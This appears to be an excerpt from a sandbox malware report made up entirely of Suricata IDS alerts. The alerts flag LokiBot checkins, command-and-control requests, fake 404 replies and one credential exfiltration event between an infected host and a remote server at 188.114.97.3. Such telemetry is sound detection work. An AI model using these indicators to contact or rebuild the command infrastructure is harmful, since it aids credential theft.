            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49754
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49715
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49713 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49758 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49779 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49777 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49779 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49705 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49726
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49745 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49761 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49761 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49777 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49761 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49777 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49761 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49745
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49743
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49761 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49735 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49735 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49735 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49761
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49756 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49744 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49756 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49744 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49735 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49735 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49700 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49760 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49760 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49700 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49741
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49771 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49758 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49760 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49706 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49706 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49735
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49777 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49747 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49777 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49758 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49758 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49736 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49736 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49736 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49737 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49771 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49737 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49737 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49736 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49736 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49744 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49790 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49790 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49758
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49747 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49786 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49747 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49747 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49786 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49786 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49763 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49767 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49771 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49756
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49797 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49767 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49771 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49771 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49767 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49786 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49700 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49786 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49777
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49713
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49797 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49797 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49738 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49738 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49738 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49796 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49797 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49796 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49738 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49779
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49738 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49767 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49700 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49728 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49790 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49728 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49767 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49714 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49714 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49714 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49771
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49747
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49763 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49714 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49714 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49714
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49788 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49788 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49788 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49796 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49767
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49776 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49776 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49776 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49788 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49788 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49776 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49776 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49788
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49776
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49796 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49765 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49796 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49765 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49789 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49789 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49789 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49701
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49790 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49789 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49790 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49731 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49731 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49731 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49800 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49800 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49800 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49731 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49731 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49800 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49705 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49800 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49711 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49786
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49711 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49763 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49759 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49759 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49728 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49797 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49765 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49765 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49763 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49763 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49759 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49710 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49710 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49710 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49710 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49705 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49730 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49800
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49730 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49730 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49744 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49797
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49796
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49728 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49728 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49730 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49759 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49812 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49730 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49809 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49759 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49809 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49702 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49809 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49790
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49711 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49711 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49809 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49744 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49809 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49705 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49710 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49763
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49804 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49728
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49783 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49811 -> 188.114.97.3:80
